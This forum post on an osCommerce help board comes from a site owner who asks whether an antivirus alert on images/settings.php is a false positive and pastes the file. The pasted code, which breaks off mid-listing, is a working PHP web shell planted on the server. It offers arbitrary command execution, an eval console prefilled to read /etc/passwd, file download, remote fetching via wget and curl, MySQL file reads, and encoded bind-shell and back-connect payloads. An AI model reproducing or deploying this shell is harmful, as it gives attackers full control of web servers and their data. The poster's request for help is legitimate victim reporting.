osCommerce

PHP virus settings.php


qwertyjjj


I do a weekly backup of my site to my local hard drive.

As I was making the backup this week, the following came up in Avira:

Begin scan in 'C:\Documents and Settings\J\My Documents\Website backups\mywebsite.co.uk\cart\images\settings.php'

C:\Documents and Settings\J\My Documents\Website backups\mywebsite.co.uk\cart\images\settings.php

[DETECTION] Contains recognition pattern of the PHP/Agent.40569 PHP virus

 

Is this a false positive?

It seems to be set to 777. I have changed it to 000 and put exit() at the top of the script as a temporary measure.

 

These are the contents:

<?php

if(isset($_GET['dl']) && ($_GET['dl'] != ""))
{
   $file = $_GET['dl'];
   $filez = @file_get_contents($file);
   header("Content-type: application/octet-stream");
   header("Content-length: ".strlen($filez));
   header("Content-disposition: attachment; filename=\"".basename($file)."\";");
   echo $filez;
   exit;
}elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
{
   $file = $_GET['dlgzip'];
   $filez = gzencode(@file_get_contents($file));
   header("Content-Type:application/x-gzip\n");
   header("Content-length: ".strlen($filez));
   header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
   echo $filez;
   exit;
}
if(isset($_GET['img']))
{
   @ob_clean();
   $d = magicboom($_GET['y']);
   $f = $_GET['img'];
   $inf = @getimagesize($d.$f);
   $ext = explode($f,".");
   $ext = $ext[count($ext)-1];
   @header("Content-type: ".$inf["mime"]);
   @header("Cache-control: public");
   @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
   @header("Cache-control: max-age=".(60*60*24*7));
   @readfile($d.$f);
   exit;
}
$ver = "1.01";
$software = getenv("SERVER_SOFTWARE");

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
   $safemode = TRUE;
else
   $safemode = FALSE;
   $system = @php_uname();

if(strtolower(substr($system,0,3)) == "win")
   $win = TRUE;
else
   $win = FALSE;

if(isset($_GET['y']))
{
   if(@is_dir($_GET['view']))
   {
       $pwd = $_GET['view'];
       @chdir($pwd);
   } else
   {
       $pwd = $_GET['y'];
       @chdir($pwd);
   }
}

if(!$win)
{
   if(!$user = rapih(exe("whoami")))
       $user = "";
   if(!$id = rapih(exe("id")))
       $id = "";

       $prompt = $user." \$ ";
       $pwd = @getcwd().DIRECTORY_SEPARATOR;
}else
{
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$sort_default = "0a";
$sort_save = TRUE;

   $user = @get_current_user();
   $id = $user;
   $prompt = $user." >";
   $pwd = realpath(".")."\\";
   $v = explode("\\",$d);
   $v = $v[0];
   foreach (range("A","Z") as $letter)
   {
       $bool = @is_dir($letter.":\\");
       if ($bool)
       {
           $letters .= "<a href=\"?y=".$letter.":\\\">[ ";
           if ($letter.":" != $v)
               {$letters .= $letter;}
           else
               {$letters .= "<span class=\"gaya\">".$letter."</span>";}

           $letters .= " ]</a> ";
       }
   }
}

if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
    $posix = TRUE;
else
    $posix = FALSE;

$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
$my_ip = $_SERVER['REMOTE_ADDR'];
$bindport = "13123";
$bindport_pass = "HERE06";
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
{
   $pathz = "";
   for($j = 0 ; $j <= $i ; $j++)
   { $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; }
   $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}

if(isset($_POST['rename']))
{
   $old = $_POST['oldname'];
   $new = $_POST['newname'];
   @rename($pwd.$old,$pwd.$new);
   $file = $pwd.$new;
}

$buff = $software."<br />";
$buff .= $system."<br />";
if($id != "")
   $buff .= $id."<br />";
$buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : ".$my_ip."<br />";

if($safemode)
   $buff .= "safemode <span class=\"gaya\">ON</span><br />";
else
   $buff .= "safemode <span class=\"gaya\">OFF<span><br />";

$buff .= $letters." > ".$pwdurl;

function rapih($text)
{
   return trim(str_replace("<br />","",$text));
}

function magicboom($text)
{
   if (!get_magic_quotes_gpc())
   { return $text; }
   return stripslashes($text);
}

function showdir($pwd,$prompt)
{
@set_time_limit(0);
eval(gzinflate(base64_decode('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')));

   $fname = array();
   $dname = array();
   if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))
       $posix = TRUE;
   else
       $posix = FALSE;
   $user = "????:????";
   if($dh = opendir($pwd))
   {
       while($file = readdir($dh))
       {
           if(is_dir($file))
           {
               $dname[] = $file;
           } elseif(is_file($file))
           { $fname[] = $file; }
       }
       closedir($dh);
   }

sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = "";
$buff = " <form action=\"?y=".$pwd."&x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\"> <table class=\"cmdbox\" style=\"width:50%;\"> <tr><td>$prompt</td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form> <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <tr><td>view file/folder</td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr> </form></table><table class=\"explore\"> <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr> ";

if($tree > 2)
   for($i=0;$i<$tree-2;$i++)
   $parent .= $path[$i].DIRECTORY_SEPARATOR;
else
   $parent = $pwd;
   foreach($dname as $folder)
   {
       if($folder == ".")
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
           { $owner = $user; }
           $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\"><a href=\"?y=$pwd&edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form></td></tr> ";
       } elseif($folder == "..")
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
           { $owner = $user; }

           $buff .= "<tr><td><a href=\"?y=".$parent."\">$folder</a></td><td>LINK</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($parent)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\"titik2\"><a href=\"?y=$pwd&edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span> <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" /> </form> </td></tr>";
       } else
       {
           if(!$win && $posix)
           {
               $name=@posix_getpwuid(@fileowner($folder));
               $group=@posix_getgrgid(@filegroup($folder));
               $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
           } else
               { $owner = $user; }
           $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" /> </form> <td>DIR</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&fdelete=".$pwd.$folder."\">delete</a></td></tr>";
       }
   }
   foreach($fname as $file)
   {
       $full = $pwd.$file;
       if(!$win && $posix)
       {
           $name=@posix_getpwuid(@fileowner($file));
           $group=@posix_getgrgid(@filegroup($file));
           $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
       } else
           { $owner = $user; }

       $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&view=$full\">$file</a> <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" /> </form> </td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td>".get_perms($full)."</td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td> <td><a href=\"?y=$pwd&edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&delete=$full\">delete</a> | <a href=\"?y=$pwd&dl=$full\">download</a> (<a href=\"?y=$pwd&dlgzip=$full\">gzip</a>)</td></tr>";
   }

   $buff .= "</table>"; return $buff;
}

function ukuran($file)
{
   if($size = @filesize($file))
   {
       if($size <= 1024)
       return $size;
       else
       {
           if($size <= 1024*1024)
           {
               $size = @round($size / 1024,2);; return "$size kb";
           } else
           {
               $size = @round($size / 1024 / 1024,2);
               return "$size mb";
           }
       }
   } else return "???";
}

function exe($cmd)
{
   if(function_exists('system'))
   {
       @ob_start();
       @system($cmd);
       $buff = @ob_get_contents();
       @ob_end_clean();
       return $buff;
   } elseif(function_exists('exec'))
   {
       @exec($cmd,$results);
       $buff = "";
       foreach($results as $result){ $buff .= $result; } return $buff;
   } elseif(function_exists('passthru'))
   {
       @ob_start();
       @passthru($cmd);
       $buff = @ob_get_contents();
       @ob_end_clean();
       return $buff;
   } elseif(function_exists('shell_exec'))
   {
       $buff = @shell_exec($cmd);
       return $buff;
   }
}

function tulis($file,$text)
{
   $textz = gzinflate(base64_decode($text));
   if($filez = @fopen($file,"w"))
   {
       @fputs($filez,$textz);
       @fclose($file);
   }
}

function ambil($link,$file)
{
   if($fp = @fopen($link,"r"))
   {
       while(!feof($fp))
       {
           $cont.= @fread($fp,1024);
       }
       @fclose($fp);
       $fp2 = @fopen($file,"w");
       @fwrite($fp2,$cont);
       @fclose($fp2);
   }
}

function which($pr)
{
   $path = exe("which $pr");
   if(!empty($path))
   {
       return trim($path);
   } else { return trim($pr); }
}

function download($cmd,$url)
{
   $namafile = basename($url);
   switch($cmd)
   {
       case 'wwget':
           exe(which('wget')." ".$url." -O ".$namafile);
       break;
       case 'wlynx':
           exe(which('lynx')." -source ".$url." > ".$namafile);
       break;
       case 'wfread' :
           ambil($wurl,$namafile);
       break;
       case 'wfetch' :
           exe(which('fetch')." -o ".$namafile." -p ".$url);
       break;
       case 'wlinks' :
           exe(which('links')." -source ".$url." > ".$namafile);
       break;
       case 'wget' :
           exe(which('GET')." ".$url." > ".$namafile);
       break;
       case 'wcurl' :
           exe(which('curl')." ".$url." -o ".$namafile);
       break;
       default: break;
   }
   return $namafile;
}

function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j 
S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw=="; ?> <html><head><title>.::ir4dex::.</title> <script type="text/javascript"> function tukar(lama,baru){ document.getElementById(lama).style.display = 'none'; document.getElementById(baru).style.display = 'block'; } </script> <style type="text/css"> body{ background:#000000;; } a { text-decoration:none; } a:hover{ border-bottom:1px solid #4C83AF; } *{ font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; } #menu{ background:#111111; margin:8px 2px 4px 2px; } #menu a{ padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; } #menu a:hover{ background:#191919; border-bottom:1px solid #333333; border-top:1px solid #333333; } .tabnet{ margin:15px auto 0 auto; border: 1px solid #333333; } .main { width:100%; } .gaya { color: #4C83AF; } .inputz{ background:#111111; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; } .inputzbut{ background:#111111; color:#4C83AF; margin:0 4px; border:1px solid #444444; } .inputz:hover, .inputzbut:hover{ border-bottom:1px solid #4C83AF; border-top:1px solid #4C83AF; } .output { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; } .cmdbox{ width:100%; } .head_info{ 
padding: 0 4px; } .b1{ font-size:30px; padding:0; color:#444444; } .b2{ font-size:30px; padding:0; color: #333333; } .b_tbl{ text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; } .phpinfo table{ width:100%; padding:0 0 0 0; } .phpinfo td{ background:#111111; color:#cccccc; padding:6px 8px;; } .phpinfo th, th{ background:#191919; border-bottom:1px solid #333333; font-weight:normal; } .phpinfo h2, .phpinfo h2 a{ text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; } .explore{ width:100%; } .explore a { text-decoration:none; } .explore td{ border-bottom:1px solid #333333; padding:0 8px; line-height:24px; } .explore th{ padding:3px 8px; font-weight:normal; } .explore th:hover , .phpinfo th:hover{ border-bottom:1px solid #4C83AF; } .explore tr:hover{ background:#111111; } .viewfile{ background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; } .sembunyi{ display:none; padding:0;margin:0; } </style> </head> <body onLoad="document.getElementById('cmd').focus();"> <div class="main"> <!-- head info start here --> <div class="head_info"> <table><tr> <td><table class="b_tbl"><tr><td><a href="?"><span class="b1">su<span class="b2">b</span>zid</span></a></td></tr><tr><td>shell <?php echo $ver; ?></td></tr></table></td> <td><?php echo $buff; ?></td> </tr></table> </div> <!-- head info end here --> <!-- menu start --> <div id="menu"> <a href="?<?php echo "y=".$pwd; ?>">explore</a> <a href="?<?php echo "y=".$pwd; ?>&x=shell">shell</a> <a href="?<?php echo "y=".$pwd; ?>&x=php">eval</a> <a href="?<?php echo "y=".$pwd; ?>&x=mysql">mysql</a> <a href="?<?php echo "y=".$pwd; ?>&x=phpinfo">phpinfo</a> <a href="?<?php echo "y=".$pwd; ?>&x=netsploit">netsploit</a> <a href="?<?php echo "y=".$pwd; ?>&x=upload">upload</a>  <a href="?<?php echo "y=".$pwd; ?>&x=mail">mail</a><a href="http://here06.info" target="_blank"http://here06.info" target="_blank">HERE06</a></div> <!-- menu end --> <?php 
if(isset($_GET['x']) && ($_GET['x'] == 'php')){ ?> <form action="?y=<?php echo $pwd; ?>&x=php" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="cmd" id="cmd"> <?php if(isset($_POST['submitcmd'])) { echo eval(magicboom($_POST['cmd'])); } else echo "echo file_get_contents('/etc/passwd');"; ?> </textarea> <tr><td><input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" /></td></tr></form> </table> </form> <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql')){ if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){ $sqlhost = $_GET['sqlhost']; $sqluser = $_GET['sqluser']; $sqlpass = $_GET['sqlpass']; $sqlport = $_GET['sqlport']; if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){ $msg .= "<div style=\"width:99%;padding:4px 10px 0 10px;\">"; $msg .= "<p>Connected to ".$sqluser."<span class=\"gaya\">@</span>".$sqlhost.":".$sqlport; $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&\">[ databases ]</a>"; if(isset($_GET['db'])) $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."\">".htmlspecialchars($_GET['db'])."</a>"; if(isset($_GET['table'])) $msg .= "  <span class=\"gaya\">-></span>  <a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$_GET['db']."&table=".$_GET['table']."\">".htmlspecialchars($_GET['table'])."</a>"; $msg .= "</p><p>version : ".mysql_get_server_info($con)." 
proto ".mysql_get_proto_info($con)."</p>"; $msg .= "</div>"; echo $msg; if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $query = "DROP TABLE IF EXISTS here06_table;\nCREATE TABLE `here06_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE \"/etc/passwd\"\nINTO TABLE here06_table;SELECT * FROM here06_table;\nDROP TABLE IF EXISTS here06_table;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">$query</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $tables = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available tables on ".$db."</th></tr>"; $hasil = @mysql_list_tables($db,$con); while(list($table) = @mysql_fetch_row($hasil)){ @array_push($tables,$table); } @sort($tables); foreach($tables as $table){ $msg .= "<tr><td><a href=\"?y=".$pwd."&x=mysql&sqlhost=".$sqlhost."&sqluser=".$sqluser."&sqlpass=".$sqlpass."&sqlport=".$sqlport."&db=".$db."&table=".$table."\">$table</a></td></tr>"; } $msg .= "</table>"; } elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){ $db = $_GET['db']; $table = $_GET['table']; $query = "SELECT * FROM ".$db.".".$table." 
LIMIT 0,100;"; $msgq = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $columns = array(); $msg = "<table class=\"explore\" style=\"width:99%;\">"; $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table); while(list($column) = @mysql_fetch_row($hasil)){ $msg .= "<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." 
LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = " "; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" 
name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";   <span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = " "; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";   <span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input 